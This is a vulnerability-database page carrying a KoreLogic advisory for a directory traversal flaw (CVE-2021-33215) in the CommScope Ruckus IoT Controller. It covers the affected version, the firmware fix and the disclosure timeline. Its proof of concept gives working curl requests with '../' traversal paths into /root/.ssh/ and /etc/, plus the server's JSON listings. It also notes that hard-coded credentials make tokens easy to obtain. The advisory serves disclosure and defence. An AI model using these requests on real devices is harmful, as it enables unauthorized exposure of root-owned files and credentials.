Vulners
Lucene search
CommScope Ruckus IoT Controller 1.7.1.0 Web Application Directory Traversal Vulnerability
| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
 | CommScope Ruckus IoT Controller 1.7.1.0 Hard-Coded Web Application Administrator Password | 27 May 202100:00 | – | zdt |
| CommScope Ruckus IoT Controller 1.7.1.0 Web Application Arbitrary Read/Write Vulnerability | 27 May 202100:00 | – | zdt |
 | CommScope Ruckus IoT Controller 信任管理问题漏洞 | 27 May 202100:00 | – | cnnvd |
| CommScope Ruckus IoT Controller 路径遍历漏洞 | 27 May 202100:00 | – | cnnvd |
 | CVE-2021-33215 | 7 Jul 202114:04 | – | cve |
| CVE-2021-33219 | 7 Jul 202114:23 | – | cve |
 | CVE-2021-33215 | 7 Jul 202114:04 | – | cvelist |
| CVE-2021-33219 | 7 Jul 202114:23 | – | cvelist |
 | EUVD-2021-19927 | 7 Oct 202500:30 | – | euvd |
| EUVD-2021-19931 | 7 Oct 202500:30 | – | euvd |
10
CommScope Ruckus IoT Controller 1.7.1.0 Web Application Directory Traversal Vulnerability
1. Vulnerability Details
Affected Vendor: CommScope
Affected Product: Ruckus IoT Controller
Affected Version: 1.7.1.0 and earlier
Platform: Linux
CWE Classification: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'),
CWE-250: Execution with Unnecessary Privileges
CVE ID: CVE-2021-33215
2. Vulnerability Description
A Python script (web.py) for a Dockerized webservice contains
a directory traversal vulnerability, which can be leveraged by
an authenticated attacker to view the contents of directories
on the IoT Controller.
3. Technical Description
The CommScope Ruckus IoT Controller features a directory
traversal vulnerability that allows an authenticated attacker
to explore the IoT Controller's file system. The vulnerable
Python script is /VRIOT/ops/docker/webservice/web.py.
With the web application running as root, this allows for all
directories to be explored.
An authentication token is required. But a token is easily
obtained due to hard-coded, default, unchangeable web application
credentials (CVE-2021-33219).
4. Mitigation and Remediation Recommendation
The vendor has released an updated firmware (1.8.0.0) which
remediates the described vulnerability. Firmware and release
notes are available at:
https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf
5. Credit
This vulnerability was discovered by Jim Becher (@jimbecher)
of KoreLogic, Inc.
6. Disclosure Timeline
2021.03.30 - KoreLogic submits vulnerability details to
CommScope.
2021.03.30 - CommScope acknowledges receipt and the intention
to investigate.
2021.04.06 - CommScope notifies KoreLogic that this issue,
along with several others reported by KoreLogic,
will require more than the standard 45 business
day remediation timeline.
2021.04.06 - KoreLogic agrees to extend disclosure embargo if
necessary.
2021.04.30 - CommScope informs KoreLogic that remediation for
this vulnerability will be available inside of the
standard 45 business day timeline. Requests
KoreLogic acquire CVE number for this
vulnerability.
2021.05.14 - 30 business days have elapsed since the
vulnerability was reported to CommScope.
2021.05.17 - CommScope notifies KoreLogic that the patched
version of the firmware will be available the week
of 2021.05.24.
2021.05.19 - KoreLogic requests CVE from MITRE.
2021.05.19 - MITRE issues CVE-2021-33215.
2021.05.25 - CommScope releases firmware 1.8.0.0 and associated
advisory.
2021.05.26 - KoreLogic public disclosure.
7. Proof of Concept
$ curl -k -H "Authorization: Token [valid token]"
'https://192.168.2.220/service/v1/node-red/static?path=/../../../../../../../../root/.ssh/'
{u'base_path': u'/VRIOT/node-red/static/../../../../../../../../root/.ssh/',
u'message': u'List',
u'response': [{u'is_dir': False,
u'is_file': True,
u'is_symlink': False,
u'name': u'known_hosts',
u'path': u'/VRIOT/node-red/static/../../../../../../../../root/.ssh/known_hosts',
u'showpath': u'https://192.168.2.220/node-static/../../../../../../../../root/.ssh/known_hosts',
u'st_atime': 1582707570.3173862,
u'st_ctime': 1582707550.1438398,
u'st_dev': 2049,
u'st_gid': 0,
u'st_ino': 132199,
u'st_mode': 33188,
u'st_mtime': 1582707550.1438398,
u'st_nlink': 1,
u'st_size': 963,
u'st_uid': 0}],
u'static_path': u'/VRIOT/node-red/static'}
The above output is a pretty-printed version of the JSON response returned.
$ curl -k -H "Authorization: Token [valid token]"
'https://192.168.2.220/service/v1/node-red/static?path=/../../../../../../../../etc/'
{u'base_path': u'/VRIOT/node-red/static/../../../../../../../../etc/',
u'message': u'List',
u'response': [{u'is_dir': True,
u'is_file': False,
u'is_symlink': False,
u'name': u'python3',
u'path': u'/VRIOT/node-red/static/../../../../../../../../etc/python3',
u'showpath': u'/../../../../../../../../etc/python3',
u'st_atime': 1610463245.7594006,
u'st_ctime': 1493664067.5699568,
u'st_dev': 2049,
u'st_gid': 0,
u'st_ino': 262743,
u'st_mode': 16877,
u'st_mtime': 1493664067.5699568,
u'st_nlink': 2,
u'st_size': 4096,
u'st_uid': 0},
{u'is_dir': True,
u'is_file': False,
u'is_symlink': False,
u'name': u'ldap',
u'path': u'/VRIOT/node-red/static/../../../../../../../../etc/ldap',
u'showpath': u'/../../../../../../../../etc/ldap',
u'st_atime': 1610463245.7594006,
u'st_ctime': 1527803641.495955,
u'st_dev': 2049,
u'st_gid': 0,
u'st_ino': 304157,
u'st_mode': 16877,
u'st_mtime': 1527803641.495955,
u'st_nlink': 2,
u'st_size': 4096,
u'st_uid': 0},
{u'is_dir': False,
u'is_file': True,
u'is_symlink': False,
u'name': u'rsyslog.conf',
u'path': u'/VRIOT/node-red/static/../../../../../../../../etc/rsyslog.conf',
u'showpath': u'https://192.168.2.220/node-static/../../../../../../../../etc/rsyslog.conf',
u'st_atime': 1609718505.600734,
u'st_ctime': 1493664067.573957,
u'st_dev': 2049,
u'st_gid': 0,
u'st_ino': 262833,
u'st_mode': 33188,
u'st_mtime': 1453934568.0,
u'st_nlink': 1,
u'st_size': 1371,
u'st_uid': 0},
{u'is_dir': True,
u'is_file': False,
u'is_symlink': False,
u'name': u'pacemaker',
u'path': u'/VRIOT/node-red/static/../../../../../../../../etc/pacemaker',
u'showpath': u'/../../../../../../../../etc/pacemaker',
u'st_atime': 1610463245.7674005,
u'st_ctime': 1550175549.2084513,
u'st_dev': 2049,
u'st_gid': 0,
u'st_ino': 267639,
u'st_mode': 16877,
u'st_mtime': 1550175549.2084513,
u'st_nlink': 2,
u'st_size': 4096,
u'st_uid': 0},
...
...
The above output is a pretty-printed version of the JSON response returned.
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 May 2021 00:00Current
0.4Low risk
Vulners AI Score0.4
CVSS 27.5
CVSS 3.19.8
EPSS0.00706